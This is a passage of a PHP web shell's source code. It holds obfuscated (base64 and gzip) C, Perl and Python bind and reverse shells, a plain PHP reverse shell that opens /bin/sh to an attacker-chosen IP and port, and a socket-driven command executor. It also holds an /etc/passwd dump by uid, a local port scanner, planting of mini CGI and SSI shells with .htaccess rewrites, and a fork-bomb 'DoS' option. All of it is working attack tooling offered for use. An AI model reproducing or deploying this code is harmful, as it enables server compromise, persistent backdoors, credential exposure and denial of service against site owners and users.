$cbdcode.=gzinflate(base64_decode('hVJBasMwELznFVsfilRUEgd6cnNOcymF0rNxpbUtImwjKWloyd+7suzGaQjBIHtn2PHMINfK3EpYwaduFHM0KXQCmPN2Jz0QsC2UsvDA4d6h3edhEuD0N7Yl+0M4z2a6hF6A5O5WsOAww4P27DHlGfRk2dot42fkInAOfVfZjtE3DbpqCsPeN+uXjzcB9M4369ebEmMMo53H5hTk6bqxfvGr1gaBpRx+oorBhmSGfNJobHxMmPU0IUQXUmLnb9Q1WRZUXtSe2AlSz//sEJZ3WtEvKipFKxb7sXu0Ax4bGOqYMDEZhVC7bjnqi170DEkvkCV5wgNKw5I53YK5qxORhIPJughRBmetw3EnACfTxwt2dqTnFw==')); //author/license unknown $cbccode=gzinflate(base64_decode('XVBNawIxEL3nVwwrlESjq161BRELUqui25Msy5pku6FrIkksVfG/N7vWj3oYMvPmzZuXqUnFih0X0LeOS93KX1DtBu1taDX7Eu4/roSTPkKpSlwqB5tUKlwmqflkFFieGqj7/HsVE3SsKBnvIevMjjkoNVPOTSIVWKl6iKdioxXu0DbxJC/rI8nSjSz28AyD12Q8HUW3zlYb5/HcaWVx6rTE1apuTO7GywUtWz2eW/qt8jO1E5MeoPVBGH0BqDdXCHXtNzqNe6QSB5RxL3a+Cf7zRWE5G74ly2gxGrxTGM/ni1k0S6LhnICfkBlgzLRSgjmccQr44QpQJ/DkHVN/i4PQ2WOfENJvEziirTBGGxysmjFcBEngvyx+pMPl6U6I77bdaktZXovOfdGtJgQrcBCupQptHtDA5tCUAYXpx2Ti+6zQVnh2+eUT+gU=')); // Copyright (C) 2007 pentestmonkey@pentestmonkey.net $findsock=gzinflate(base64_decode('bVLbTsMwDH3vV5gioaR09zdG+QLEG0+ApqxJN4suqZIUcRH/jp11Y0yoUhIfHx87J71EW7e9NnAbPsIkuPrVxPH2Lrv8xaNGdw55tJu/mPKdmqA9ryaAQcr8xXuLJMwY2gg7hRYEn5Tf1CXUW+WLgoM3CV8ZNiA4ARcVLBjoqH9sRP4Y1MbcQINW8+iAHXTOx2eby2Vm3jGKKR2+M9aDgikrolRJ+Gn2sjxNcOEhNacUXbKvI3BOae1XNKEP6l+8ZZynD/hpSIM31wiiy6GFNzsXDTV/Wkxf9txGL7PGeRCNrhZLCm83Juqo1q3heiEZu74+3J+SnTHeqp2hihKuSJ1Wpkr2ZTRjJg1n6+5DHPuVwPavbHRKFGKYHe2KR4dCsso4DPE4pE2WsGDbuGvS23WneoOLiQRVBdPDhPx+khptgziosqeJlHIqOhRHr2Wa18SAmu6a6b6bp4tNT4PZaTBnN1sX2ID0vqZuRT5Zo5307Etewlk0UrQ+PN7fn9HD9sjdH0f4S/xO3/4XA5GP8wH7AQ==')); //code by b374k $pybdcode="#!".search("python",$failflag)."\n"; $pybdcode.=gzinflate(base64_decode('jVTbahsxEH3ehf0HVS/WYmdjO+2LWxlCcUioE5fYhUIIZrOrZEU2kpHkXP6+mpF8aZxCX7zS6MycMzfLp5U2jmjbI/YNfnT1KFyPOPkksvTy9PdyOrnig/7wc5bOzyfTKafHd1Id24YcVTRLFxeXk+Xs14IPhv1+lv6cXS849fbz2TwcanFPbCPallVPdT7K0sQ2S712XNtipVdCMQzb7RDa6XpIt0M7eWFEWbdSCcty76GiC8RL7rUhkkhFTKkeBGt9hPCcY/QNuMvD90beeqsRbm0UiW9BVVk5qRWrtFLo+dLIVpCFWQuMA/bCClUzOh6PCQUhiTNv+JisvFSOECOqZxYLhRjxWomVizAjlSMUqul5KdqiFiBCeGsDYQIhacB8kCQw5keDkCSCuxxsIcEkkfcEAnA6qisaQe+oPNcOZet3qLPSK4mwjSSICuTAPe5HWwK92PU0Gnf1gl5kaWkenrmfqQIOWRoDwSX/djIi3isWRxijzVfIG9DiVTo28P6oFeA3g1uv9+gO5eKAoXV4e4gxlJSq3hGNTw59EhxNvJ5gCJ8r2bIi1sticMhRth9U345Hln/iWIGtyr5/h33hYWmK8GHxdnq2vLiaLDYrVcxn338s54vryell9PPVcnEy2GaPAuVB2gj3e1cz1ml1VbaNtq7TI6gy3wBaaZ1PHXSZteKh7WGs/R3ivC/XaDPUqLKAHorKMcKgSDE82Z9qsj/WIIKslV/WqinvWhFmF1IqbCvEin3JtxMOCnhcOeCCl+2cgYIEN7FX1rXJsaJFWQEl+6+l2iMdfEyKe35QAl9eEia3Wbtavyg2PFBGYrPgr4D+VYx/sAb8fsA/')); //code by ont.rif $pyintserver="#!".search("python",$failflag)."\n"; $pyintserver.="import sys, socket, os, pty, fcntl, struct, termios, select, resource\n"; $pyintserver.="host = \"".$_POST["ip"]."\"\n"; $pyintserver.="port = ".$_POST["port"]."\n"; $pyintserver.=gzinflate(base64_decode('hVT9i+IwEP29f8XcgjSFXlfXdT+EPVg8lyvnKqzCwalIL41rsCYliav+9zfpl9VdsNjGJm9m3ry81KhD1wEt6RqesoGZIB9I+fr8sgiH/Ylfvo9Hvd+L8eSt//wKXh4bUCkEoxhDVlIbH1KpjIerbE9ZarBCqrgwcAW9SLgGCvi3mbhyQOpgwfYcg1sYYTJCfGmnl1KtiQc/oNmtoZq26iVAXhhG475SUvnA7FDxcMFGdqERA2lobyZcaADJQQE+hSwiAm1U9gdTYoF4m97kugRLnjAhiYeyHDTCYi6qObiMlltzhF9EI4U6uhSzoWcKnxnqgynNpXBSHvtAVzyJF8sY9zQ1h0ImBzUT0gAiuuBALjRMwlFv/Cccjv8i+J2ZyBhFDFMbLrUP7nHZ9eH7Tev27vHmsXPXwi2we1CPfgJcfmi27+/bnYFNfZq7Foxr2trNqC01QRrRNXF/4YUlbps+POBtf7bGkgqTBFxSk5CvtPNrRVAua43Kc5BGWjuwifa5FIppuVWUBdimSvgGvVJNvQ3C13CyGI5ewkHfmzbnjrUIcOACVCTeGYG2X6bybPJCP+s7mkjNgHBL+NR4GSKngTi2Z/SDgHv9j4trvcJ2p647R8473C8GE7VlGIBu3aH9rEAswVMS5AOBabWv/qlPYI6ZirtTnI7KAraBOl9sGVMjG8WimNRStpr2suFZUzvFDftkSBt9bDNvL3fjT44SZNnA8A0D3CUP7VlkOzu7p/RLimfUzkq3SnZHckfyJa/C4/j6iRvb4FkoPmJfM/sP')); switch ($_POST["shellz"]) { case "phpremote": // code by pentestmonkey.net. license: GPLv2 $ip=($_POST["ip"]); $port=($_POST["port"]); $chunk_size=1400; $write_a=null; $error_a=null; $shell='/bin/sh -i'; $daemon = 0; function printit ($string) { if (!$daemon) { print "$string\n"; }} if (function_exists('pcntl_fork')) { $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Can't fork
"); exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { printit("Error: Can't setsid()
"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise!
"); } umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Can't spawn shell
"); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port
"); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated
"); break; } if (feof($pipes[1])) { printit("ERROR: Shell process terminated
"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { $input = fread($sock, $chunk_size); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { $input = fread($pipes[1], $chunk_size); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { $input = fread($pipes[2], $chunk_size); fwrite($sock, $input); } } fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);@proc_close($process); //php backconnect end break; case "phplocal": // code by metasploit.com. license unknown, assuming BSD $port=$_POST["port"]; $scl='socket_create_listen'; if (function_enabled($scl)) { $sock=@$scl($port); } else { $sock=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP); $ret=@socket_bind($sock,0,$port); $ret=@socket_listen($sock,5); } $msgsock=@socket_accept($sock); @socket_close($sock); while (FALSE !== @socket_select($r=array($msgsock), $w=NULL, $e=NULL, NULL)) { $buffer = ''; $c=@socket_read($msgsock,2048,PHP_NORMAL_READ); if (FALSE === $c) { break; } if (substr($c,0,3) == 'cd ') { chdir(substr($c,3,-1)); } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') { break; } else { if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) { $c=$c." 2>&1\n"; } if (function_enabled('shell_exec')) { $buffer=shell_exec($c); } else if(function_enabled('passthru')) { ob_start(); passthru($c); $buffer=ob_get_contents(); ob_end_clean(); } else if(function_enabled('system')) { ob_start(); system($c); $buffer=ob_get_contents(); ob_end_clean(); } else if(function_enabled('exec')) { $buffer=array(); exec($c,$buffer); $buffer=join(chr(10),$buffer).chr(10); } else if(function_enabled('proc_open')) { $handle=proc_open($c,array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes); $buffer=NULL; while (!feof($pipes[1])) { $buffer.=fread($pipes[1],1024); } @proc_close($handle); } else if(function_enabled('popen')) { $fp=popen($c,'r'); $buffer=NULL; if (is_resource($fp)) { while (!feof($fp)) { $buffer.=fread($fp,1024); } } @pclose($fp); } else { $buffer=0; } } @socket_write($msgsock,$buffer,strlen($buffer)); } @socket_close($msgsock); echo "

phplocal done"; break; //phpbind end case "perllocal": $exec_path = trim($_POST['path']); ob_start(); @sploent516(); ob_end_clean(); $fh=fopen($exec_path,'w'); if (!$fh) { echo "

can`t fopen!"; } else { fwrite($fh,$perlbdcode); fclose($fh); chmod($exec_path,0644); $c=search("perl",$failflag).' '.$exec_path.' && rm -f '.$exec_path.''; run($c); echo "

perllocal done"; } //perl bind end break; case "perlremote": $exec_path=trim($_POST['path']); ob_start(); @sploent516(); ob_end_clean(); $fh=fopen($exec_path,'w'); if (!$fh) { echo "

can`t fopen!"; } else { fwrite($fh,$perlbccode); fclose($fh); chmod($exec_path,0644); $c=search("perl",$failflag).' '.$exec_path.' '.$_POST["ip"].' '.$_POST["port"].' && rm -f '.$exec_path.''; run($c); echo "

perlremote done"; } break; //perl backconnect end case "pylocal": $exec_path = trim($_POST['path']); ob_start(); @sploent516(); ob_end_clean(); $fh=fopen($exec_path,'w'); if (!$fh) { echo "

can`t fopen!"; } else { fwrite($fh,$pybdcode); fclose($fh); chmod($exec_path,0644); $c=search("python",$failflag).' '.$exec_path.' -b '.$_POST["port"].' && rm -f '.$exec_path.''; run($c); echo "

pylocal done"; } //python bind end case "pyremote": $exec_path=trim($_POST['path']); ob_start(); @sploent516(); ob_end_clean(); $fh=fopen($exec_path,'w'); if (!$fh) { echo "

can`t fopen!"; } else { fwrite($fh,$pybdcode); fclose($fh); chmod($exec_path,0644); $c=search("python",$failflag).' '.$exec_path.' -r '.$_POST["port"].' '.$_POST["ip"].' && rm -f '.$exec_path.''; run($c); echo "

pyremote done"; } break; //python backconnect end case "pyint": $exec_path=trim($_POST['path']); ob_start(); @sploent516(); ob_end_clean(); $fh=fopen($exec_path,'w'); if (!$fh) { echo "

can`t fopen!"; } else { fwrite($fh,$pyintserver); fclose($fh); chmod($exec_path,0644); $c=search("python",$failflag).' '.$exec_path.' && rm -f '.$exec_path.''; run($c); echo "

pyint done"; } break; //python interactive end case "clocal": $exec_path=trim($_POST['path']); ob_start(); @sploent516(); ob_end_clean(); $fh=fopen($exec_path,"w"); if (!$fh) { echo "

can`t fopen!"; } else { fwrite($fh,$cbdcode); fclose($fh); $c=search("gcc",$failflag)." -w ".$exec_path." -o ".$exec_path." && ".$exec_path." ".$_POST["port"]." | rm -f ".$exec_path.""; run($c); echo "

clocal done"; } break; //C bind end case "cremote": $exec_path=trim($_POST['path']); ob_start(); @sploent516(); ob_end_clean(); $fh=fopen($exec_path,"w"); if (!$fh) { echo "

can`t fopen!"; } else { fwrite($fh,$cbccode); fclose($fh); $c=search("gcc",$failflag)." ".$exec_path." -o ".$exec_path." && ".$exec_path." ".$_POST["ip"]." ".$_POST["port"]." | rm -f ".$exec_path.""; run($c); } break; case "findsock": $fs_path=trim($_POST['path']); ob_start(); @sploent516(); ob_end_clean(); $fh=fopen($fs_path.".c","w"); if (!$fh) { echo "

can`t fopen!"; } else { fwrite($fh,$findsock); fclose($fh); $c=search("gcc",$failflag)." ".$fs_path.".c -o ".$fs_path." && rm -f ".$fs_path.".c"; run($c); echo "
compiled, now connect to shell via nc and request ?pfs&path=".$fs_path."
"; } break; } } echo $pageend; break; // --------------------------------------------- bind end; extras case "e": if (empty($_POST["extraz"]) and $download != "1") { echo $title; echo '---> SysInfo
'; echo '
>> show <<

"; echo '---> Extraz

'; if (!function_enabled('phpinfo')) { echo "fail, phpinfo() is disabled

"; } else { echo '

'; } if(function_enabled('posix_getpwuid')) { echo '
"read" /etc/passwd from uid to
'; if (!empty($_POST["uidz"])) { echo "
"; //code by oRb for(;$_POST['uid1'] <= $_POST['uid2'];$_POST['uid1']++) { $uid = @posix_getpwuid($_POST['uid1']); if ($uid) echo join(':',$uid)."
\n"; } } } echo "
"; if(function_enabled('fsockopen')) { echo '
"scan" local open ports from to
'; if (!empty($_POST["portz"])) { for($i=$_POST["port1"]; $i <= $_POST["port2"]; $i++) { $fp=@fsockopen("127.0.0.1", $i, $errno, $errstr, 1); if ($fp) { echo "-> ".$i."
"; fclose($fp); } } } } echo '
>> minishells help << '; if (file_exists(".htaccess")) { echo '
WARNING: my .htaccess will rewrite current one!'; } echo '
put mini perl shell into / adding .htaccess '; if (is_writable("./")) { echo "(./ writable)"; } else { echo "(./ readonly)"; } echo '
'; if ($failflag=="1") { echo "can't find perl binary (all system functions disabled) assuming /usr/bin/perl
"; } echo '
put mini python shell into / adding .htaccess '; if (is_writable("./")) { echo "(./ writable)"; } else { echo "(./ readonly)"; } echo '
'; if ($failflag=="1") { echo "can't find python binary (all system functions disabled) assuming /usr/bin/python
"; } echo '
put mini SSI shell into / adding .htaccess '; if (is_writable("./")) { echo "(./ writable)"; } else { echo "(./ readonly)"; } echo '
'; echo '
'; //code by Eric A. Meyer, license CC BY-SA echo ''; echo "---> Text encoderz/decoderz

"; echo "fast URL-encoder:
"; echo '
'; echo "
other encoders: "; $cryptform="

salt: (salt needed for: md5(unix,wordpress,phpbb3,apr1) - 8 symbols, sha(256,512) - 16 symbols, and blowfish - 22 symbols. ignore these fields if you use other algorithms)
"; echo $cryptform; if(isset($_POST['crypt'])) { $text=$_POST['text']; if($text == '') { die("

empty form

\n".$pageend.""); } $hash=$_POST['hash']; $hash1=$_POST['hash1']; $hash2=$_POST['hash2']; echo("-->

"); } //decoders end echo '

---> DoS //use this carefully

'; echo '
'; echo $pageend; } if (!empty($_POST["extraz"])) { switch ($_POST["extraz"]) { case "fork": while(pcntl_fork()|1); break; case "pysh": //code by Michael Foord & 12309, license WTFPL if ($failflag=="1") { $pybin="/usr/bin/python"; } else { $pybin=search("python",$failflag); } $pyshcode='#!'.$pybin; $pyshcode.="\n"; $pyshcode.=gzinflate(base64_decode("bVRRT9swEH7Pr7jlpa0IKWObtLGmUoEClWBFbR82QRW5idNaS+LIdqBl2n/fnZ10BfGU3N33fXc+n8+o3ZkHoqikMpCshVl9d5+Ql2yV827P49uEVwZRFdPaa6B6pwMCBiC1h0aoTcqVgggaQ9bGy5QswIiCtwm0URnZrYpRLOErlvx20LlRolxPpi28tRuhFtyGK4yaGMvzRIZlYMVPQsky3DAd/+a7rj+/mE3uF/GP0d3Y7+EBdKJEZUqGBUUHhIdXwKXHc83fon3fS3kGa24yqYruE8trngttAjAbTq4ASmkqxTUvTdTpULqUGYbUP389QARkgucpiBL2ZMQAlo7EVmVfuwWTCFiZB2svUe1/Fow1lVoVMLuKdxudBt+DD5HzPyyd2Bu11/DQVkawvbArViO0YFU3Z8UqZbA9g63DBm8Ueu/kcAoeKG5qVdqg17A2nKW2uf7gZnF3OxzcjEeXw8FisrgdD9ELR4e3cERAOAYGF9cTWO3gqn552RWsDKCuUJan5Px4+unk26DvNAZ9p3g+vfxFgt5KpjteUtLOoG+9CKHUHQ/HF0viWtvg+XAuC242OIDwjN2GZ5yUNXJQbDYc3M/GSMG2xzHVFscQISuOCybKOO7Qa6HpBP9Clgbpx3QLZ2D41vQ3psj9BmBHo8CM+JbCK2rZ3EjF1vTw2gFqh+6hkxRpZxmQgVHsIdoYt+12sTbtQX+91mgafTWd3cHdeHEzvYwe/fvpfPHoA0uMkGX0fsuHA1FWtQHyIAUTIYPOgwYdCC0tXsj6fPLou/44RgPS9aoQBLOjgI5r2eL6VI69mdeVezTS7oQ0hy5Gt9IJGndgb9CpLMY/F6PZeASJzHXkfz3xQcln/Dv94uM14duwaw4g2Yg8jXE9CRyavYG7yi2ESla8PO26BL03hDDJpbb3AjjLus6JdKgRKmx39zWN3Ac8dw7HpvdrVyuM7QcvIAD36hxsP5DkyjBZuw8PtGj94bLIeZRZJ81LFuLE2FZ3e6GucmFyUXLtWLSJyKRFxNwTd9nIedDpfttT6p9zNm/H+wc=")); $htaccess=$htaccesses['cgi']; if (strnatcmp(version(),"5.2.9") <= 0) { sploent516(); } $fh=fopen($_POST["dir"]."/".$_POST["file"],"w"); if (!$fh) { echo "can`t fopen ".$_POST["dir"]."/".$_POST["file"]."!"; } else { fwrite($fh,$pyshcode); fclose($fh); echo $_POST["file"]." write done, chmoding..
"; $ch=chmod($_POST["dir"]."/".$_POST["file"], 0755); if (!$ch) { echo "chmod failed, make chmod 755 manually
"; } else { echo "chmod done
"; } if ($_POST["htaccess"] == "on") { $fh=fopen($_POST["dir"]."/.htaccess","w"); fwrite($fh,$htaccess); fclose($fh); echo "htaccess done"; } } break; case "perlsh": //author/license unknown if ($failflag=="1") { $perlbin="/usr/bin/perl"; } else { $perlbin=search("perl",$failflag); } $perlshcode='#!'.$perlbin; $perlshcode.="\n"; $perlshcode.=gzinflate(base64_decode("TVFLTwIxEL73V4wNMSXZFdSYGBY2QQ7E+DioRxKtu7PSpNuubRdQ5L87XYR4m3bme8w3rUeYzW/hcz1IjX3dLEOtYeSDNKV05SBj7X5gNJpJ19CYqGSQ2r/YG2fXHl0/Y41TJsASZYlOpMVSOo8BJjnwNlTpNe8njAhdeI3kItXSfHRd1/IE0qCCxu7NiUtVIKCRTtaiD33YsvoLeiuY/P3xFT8K9lYJ8PG7yxeGZ91cUDXalqThcpgxbQupofd8O99O758edvTt23fYQqEtLXU3fTwwcSCCUiHwPwaewS5jvUaVBLINGkHTpEZOLvLTc/iJLjpAIc0bWTk5IxPQGo3eg4hAGsAV6W+Z1NLV4mDuaL+zPg64oWhQQmG1nyz49XDBISZL9cXVgufkbL1UGgWMyUMeM4GOgCwemQYHmjySEmSvOSSxf8vu2AGxP0dlXZ2wCK0U6lKkRtY4ySljOotX31RTkFTTHi3uL5TEDGsVBJ/beFg0ZUcDVHT3pbU31I7Svw==")); $htaccess=$htaccesses['cgi']; if (strnatcmp(version(),"5.2.9") <= 0) { sploent516(); } $fh=fopen($_POST["dir"]."/".$_POST["file"],"w"); if (!$fh) { echo "can`t fopen ".$_POST["dir"]."/".$_POST["file"]."!"; } else { fwrite($fh,$perlshcode); fclose($fh); echo $_POST["file"]." write done, chmoding..
"; $ch=chmod($_POST["dir"]."/".$_POST["file"], 0755); if (!$ch) { echo "chmod failed, make chmod 755 manually
"; } else { echo "chmod done
"; } if ($_POST["htaccess"] == "on") { $fh=fopen($_POST["dir"]."/.htaccess","w"); fwrite($fh,$htaccess); fclose($fh); echo "htaccess done"; } } break; case "ssish": // code by profexer $ssishcode=gzinflate(base64_decode("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")); $htaccess=$htaccesses['ssi']; if (strnatcmp(version(),"5.2.9") <= 0) { sploent516(); } $fh=fopen($_POST["dir"]."/".$_POST["file"],"w"); if (!$fh) { echo "can`t fopen ".$_POST["dir"]."/".$_POST["file"]."!"; } else { fwrite($fh,$ssishcode); fclose($fh); echo $_POST["file"]." write done
"; if ($_POST["htaccess"] == "on") { $fh=fopen($_POST["dir"]."/.htaccess","w"); fwrite($fh,$htaccess); fclose($fh); echo "htaccess done"; } } break; } } break; // extras end ### case "pi": phpinfo(); break; } // :) ?>